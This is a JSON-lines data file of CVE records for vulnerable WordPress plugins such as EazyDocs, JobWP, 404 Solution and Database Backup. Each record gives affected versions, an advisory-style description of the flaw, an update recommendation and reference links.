{"CVE_ID":"CVE-2024-0248","slug":"eazydocs","versionImpact":"2.3.9","versionEndExcluding":"2.4.0","description":"The EazyDocs WordPress plugin before 2.4.0 re-introduced CVE-2023-6029 (https:\/\/wpscan.com\/vulnerability\/7a0aaf85-8130-4fd7-8f09-f8edc929597e\/) in 2.3.8, allowing any authenticated users, such as subscriber to delete arbitrary posts, as well as add and delete documents\/sections. The issue was partially fixed in 2.3.9.","recommendation":"Update to version 2.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/faf50bc0-64c5-4ccc-a8ac-e73ed44a74df\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/faf50bc0-64c5-4ccc-a8ac-e73ed44a74df\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0507","slug":"ploxel","versionImpact":"2.3.6","versionEndExcluding":"2.4.0","description":"The Ticketmeo \u2013 Sell Tickets \u2013 Event Ticketing plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in all versions up to, and including, 2.3.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ploxel\\\/tags\\\/2.2.0\\\/ploxel.php#L49\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ploxel\\\/tags\\\/2.2.0\\\/ploxel.php#L49\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231203\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231203\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/149edbdf-4a27-4d79-8dd1-b5b3efbf648b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/149edbdf-4a27-4d79-8dd1-b5b3efbf648b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11330","slug":"custom-css","versionImpact":"2.3.0","versionEndExcluding":"2.4.0","description":"The Custom CSS, JS & PHP plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.3.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-css\\\/tags\\\/2.3.0\\\/includes\\\/settings\\\/class-alg-custom-css-js-php-settings.php#L299\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-css\\\/tags\\\/2.3.0\\\/includes\\\/settings\\\/class-alg-custom-css-js-php-settings.php#L299\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3194786\\\/custom-css\\\/trunk\\\/includes\\\/settings\\\/class-alg-custom-css-js-php-settings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3194786\\\/custom-css\\\/trunk\\\/includes\\\/settings\\\/class-alg-custom-css-js-php-settings.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3497974d-cf58-4b38-a2c9-9bcd119ef43e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3497974d-cf58-4b38-a2c9-9bcd119ef43e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8721","slug":"tracking-code-manager","versionImpact":"2.3.0","versionEndExcluding":"2.4.0","description":"The Tracking Code Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the tracking code field in all versions up to, and including, 2.3.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3211908%40tracking-code-manager&new=3211908%40tracking-code-manager&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3211908%40tracking-code-manager&new=3211908%40tracking-code-manager&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/443d2e80-31db-40ac-9c35-88eec841ebba?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/443d2e80-31db-40ac-9c35-88eec841ebba?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8625","slug":"poll-wp","versionImpact":"2.3.9","versionEndExcluding":"2.4.0","description":"The TS Poll  WordPress plugin before 2.4.0 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks","recommendation":"Update to version 2.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ab4d7065-4ea2-4233-9593-0f540f91f45e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ab4d7065-4ea2-4233-9593-0f540f91f45e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5489","slug":"custom-font-uploader","versionImpact":"2.3.4","versionEndExcluding":"2.4.0","description":"The Wbcom Designs \u2013 Custom Font Uploader plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'cfu_delete_customfont' function in all versions up to, and including, 2.3.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete any custom font.","recommendation":"Update to version 2.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2339ebbf-2302-4e83-9743-ca79fda20f05?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2339ebbf-2302-4e83-9743-ca79fda20f05?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-font-uploader\\\/trunk\\\/inc\\\/cfup-functions.php#L20\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-font-uploader\\\/trunk\\\/inc\\\/cfup-functions.php#L20\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097373\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097373\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2010","slug":"jobwp","versionImpact":"2.3.9","versionEndExcluding":"2.4.0","description":"The JobWP \u2013 Job Board, Job Listing, Career Page and Recruitment Plugin plugin for WordPress is vulnerable to SQL Injection via the 'jobwp_upload_resume' parameter in all versions up to, and including, 2.3.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3271612\\\/jobwp\\\/tags\\\/2.4.0\\\/core\\\/job_application.php?old=3230672&old_path=jobwp%2Ftags%2F2.3.9%2Fcore%2Fjob_application.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3271612\\\/jobwp\\\/tags\\\/2.4.0\\\/core\\\/job_application.php?old=3230672&old_path=jobwp%2Ftags%2F2.3.9%2Fcore%2Fjob_application.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3b658f0-b9d8-4b7f-8d40-39ce185ef797?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3b658f0-b9d8-4b7f-8d40-39ce185ef797?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13516","slug":"kubio","versionImpact":"2.3.5","versionEndExcluding":"2.4.0","description":"The Kubio AI Page Builder plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'message' parameter in all versions up to, and including, 2.3.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186251\\\/kubio\\\/trunk\\\/static\\\/kubio-iframe-loader.html\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186251\\\/kubio\\\/trunk\\\/static\\\/kubio-iframe-loader.html\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2246fac-0d95-4ff5-ad1e-aa1fefa03b4d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2246fac-0d95-4ff5-ad1e-aa1fefa03b4d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6807","slug":"generatepress-premium","versionImpact":"2.3.2","versionEndExcluding":"2.4.0","description":"The GeneratePress Premium plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's custom meta output in all versions up to, and including, 2.3.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9dcd48b8-ec9e-44b4-b531-95940adbd100?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9dcd48b8-ec9e-44b4-b531-95940adbd100?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/generatepress.com\\\/category\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/generatepress.com\\\/category\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5691","slug":"collectchat","versionImpact":"2.3.9","versionEndExcluding":"2.4.0","description":"The Chatbot for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in version 2.3.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 2.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dfd67329-11b1-4f00-a422-bb4833a3181d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dfd67329-11b1-4f00-a422-bb4833a3181d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3000724%40collectchat%2Ftrunk&old=2983408%40collectchat%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3000724%40collectchat%2Ftrunk&old=2983408%40collectchat%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12321","slug":"wc-affiliate","versionImpact":"2.3","versionEndExcluding":"2.4","description":"The WC Affiliate  WordPress plugin through 2.3.9 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"Update to version 2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d4c55d30-1c15-41ee-95e0-670891d67684\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d4c55d30-1c15-41ee-95e0-670891d67684\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d4c55d30-1c15-41ee-95e0-670891d67684\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d4c55d30-1c15-41ee-95e0-670891d67684\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12066","slug":"smsa-shipping-official","versionImpact":"2.3","versionEndExcluding":"2.4","description":"The SMSA Shipping(official) plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the smsa_delete_label() function in all versions up to, and including, 2.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smsa-shipping-official\\\/trunk\\\/smsa-express-shipping.php#L235\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smsa-shipping-official\\\/trunk\\\/smsa-express-shipping.php#L235\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29d72347-ba49-45c6-a964-2c75064ac866?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29d72347-ba49-45c6-a964-2c75064ac866?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-36399","slug":"booked","versionEndExcluding":"2.4","description":"Exposure of Sensitive Information to an Unauthorized Actor vulnerability in BoxyStudio Booked - Appointment Booking for WordPress | Calendars.This issue affects Booked - Appointment Booking for WordPress | Calendars: from n\/a before 2.4.4.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/booked\\\/wordpress-booked-plugin-2-4-unauth-appointment-data-exposure-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/booked\\\/wordpress-booked-plugin-2-4-unauth-appointment-data-exposure-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9290","slug":"indeed-wp-superbackup","versionImpact":"2.3.3","versionEndExcluding":"2.4","description":"The Super Backup & Clone - Migrate for WordPress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation and a missing capability check on the ibk_restore_migrate_check() function in all versions up to, and including, 2.3.3. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/super-backup-clone-migrate-for-wordpress\\\/12943030\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/super-backup-clone-migrate-for-wordpress\\\/12943030\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c31d9b3-38b1-49a1-b361-ffe97e02bff0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c31d9b3-38b1-49a1-b361-ffe97e02bff0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5087","slug":"minimal-coming-soon-maintenance-mode","versionImpact":"2.38","versionEndExcluding":"2.39","description":"The Minimal Coming Soon \u2013 Coming Soon Page plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the validate_ajax, deactivate_ajax, and save_ajax functions in all versions up to, and including, 2.38. This makes it possible for authenticated attackers, with Subscriber-level access and above, to edit the license key, which could disable features of the plugin.","recommendation":"Update to version 2.39, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/affdaf63-2098-4ad6-b15b-990d1941fecb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/affdaf63-2098-4ad6-b15b-990d1941fecb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/minimal-coming-soon-maintenance-mode\\\/tags\\\/2.38\\\/framework\\\/wf-licensing.php#L51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/minimal-coming-soon-maintenance-mode\\\/tags\\\/2.38\\\/framework\\\/wf-licensing.php#L51\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/minimal-coming-soon-maintenance-mode\\\/tags\\\/2.38\\\/framework\\\/wf-licensing.php#L52\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/minimal-coming-soon-maintenance-mode\\\/tags\\\/2.38\\\/framework\\\/wf-licensing.php#L52\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/minimal-coming-soon-maintenance-mode\\\/tags\\\/2.38\\\/framework\\\/wf-licensing.php#L54\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/minimal-coming-soon-maintenance-mode\\\/tags\\\/2.38\\\/framework\\\/wf-licensing.php#L54\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/minimal-coming-soon-maintenance-mode\\\/tags\\\/2.38\\\/framework\\\/wf-licensing.php#L561\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/minimal-coming-soon-maintenance-mode\\\/tags\\\/2.38\\\/framework\\\/wf-licensing.php#L561\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/minimal-coming-soon-maintenance-mode\\\/tags\\\/2.38\\\/framework\\\/wf-licensing.php#L585\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/minimal-coming-soon-maintenance-mode\\\/tags\\\/2.38\\\/framework\\\/wf-licensing.php#L585\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/minimal-coming-soon-maintenance-mode\\\/tags\\\/2.38\\\/framework\\\/wf-licensing.php#L596\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/minimal-coming-soon-maintenance-mode\\\/tags\\\/2.38\\\/framework\\\/wf-licensing.php#L596\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/swisskyrepo\\\/PayloadsAllTheThings\\\/blob\\\/master\\\/CRLF%20Injection\\\/README.md\",\"name\":\"https:\\\/\\\/github.com\\\/swisskyrepo\\\/PayloadsAllTheThings\\\/blob\\\/master\\\/CRLF%20Injection\\\/README.md\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3099123\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3099123\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1075","slug":"minimal-coming-soon-maintenance-mode","versionImpact":"2.37","versionEndExcluding":"2.38","description":"The Minimal Coming Soon \u2013 Coming Soon Page plugin for WordPress is vulnerable to maintenance mode bypass and information disclosure in all versions up to, and including, 2.37. This is due to the plugin improperly validating the request path. This makes it possible for unauthenticated attackers to bypass maintenance mode and view pages that should be hidden.","recommendation":"Update to version 2.38, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78203b98-15bc-4d8e-9278-c472b518be07?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78203b98-15bc-4d8e-9278-c472b518be07?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/minimal-coming-soon-maintenance-mode\\\/trunk\\\/framework\\\/public\\\/init.php#L67\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/minimal-coming-soon-maintenance-mode\\\/trunk\\\/framework\\\/public\\\/init.php#L67\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031149\\\/minimal-coming-soon-maintenance-mode\\\/trunk\\\/framework\\\/public\\\/init.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031149\\\/minimal-coming-soon-maintenance-mode\\\/trunk\\\/framework\\\/public\\\/init.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12472","slug":"post-duplicator","versionImpact":"2.36","versionEndExcluding":"2.37","description":"The Post Duplicator plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.36 via the mtphr_duplicate_post() due to insufficient restrictions on which posts can be duplicated. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from password protected, private, or draft posts that they should not have access to by duplicating the post.","recommendation":"Update to version 2.37, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3219375%40post-duplicator&new=3219375%40post-duplicator&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3219375%40post-duplicator&new=3219375%40post-duplicator&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3071b2dc-9673-4e30-bd04-7404eb6a1ed9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3071b2dc-9673-4e30-bd04-7404eb6a1ed9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13910","slug":"database-backup","versionImpact":"2.36","versionEndExcluding":"2.37","description":"The Database Backup and check Tables Automated With Scheduler 2024 plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the 'database_backup_ajax_delete' function in all versions up to, and including, 2.35. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). The vulnerability was partially patched in version 2.36.","recommendation":"Update to version 2.37, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/database-backup\\\/trunk\\\/database-backup.php#L267\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/database-backup\\\/trunk\\\/database-backup.php#L267\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3247917\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3247917\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3248708\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3248708\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c92776c4-643c-40f2-ac28-5df5d6bf7fcd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c92776c4-643c-40f2-ac28-5df5d6bf7fcd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13911","slug":"database-backup","versionImpact":"2.35","versionEndExcluding":"2.36","description":"The Database Backup and check Tables Automated With Scheduler 2024 plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.35 via the \/dashboard\/backup.php file. This makes it possible for authenticated attackers, with Administrator-level access and above, to extract sensitive data including full database credentials.","recommendation":"Update to version 2.36, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/database-backup\\\/trunk\\\/dashboard\\\/backup.php#L62\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/database-backup\\\/trunk\\\/dashboard\\\/backup.php#L62\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/database-backup\\\/trunk\\\/dashboard\\\/backup.php#L63\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/database-backup\\\/trunk\\\/dashboard\\\/backup.php#L63\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/database-backup\\\/trunk\\\/dashboard\\\/backup.php#L64\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/database-backup\\\/trunk\\\/dashboard\\\/backup.php#L64\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/database-backup\\\/trunk\\\/dashboard\\\/backup.php#L65\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/database-backup\\\/trunk\\\/dashboard\\\/backup.php#L65\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/database-backup\\\/trunk\\\/dashboard\\\/backup.php#L66\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/database-backup\\\/trunk\\\/dashboard\\\/backup.php#L66\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3247917\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3247917\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c548b70a-8566-4aaf-a3a2-fce6c19e6a0c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c548b70a-8566-4aaf-a3a2-fce6c19e6a0c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1068","slug":"404-solution","versionImpact":"2.35.7","versionEndExcluding":"2.35.8","description":"The 404 Solution WordPress plugin before 2.35.8 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admins.","recommendation":"Update to version 2.35.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/25e3c1a1-3c45-41df-ae50-0e20d86c5484\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/25e3c1a1-3c45-41df-ae50-0e20d86c5484\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11277","slug":"404-solution","versionImpact":"2.35.19","versionEndExcluding":"2.35.20","description":"The 404 Solution plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via URLs in all versions up to, and including, 2.35.19 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.35.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/259f9ea3-ac24-4bea-8d0d-c635a68d9c98?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/259f9ea3-ac24-4bea-8d0d-c635a68d9c98?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3191597%40404-solution&new=3191597%40404-solution&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3191597%40404-solution&new=3191597%40404-solution&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
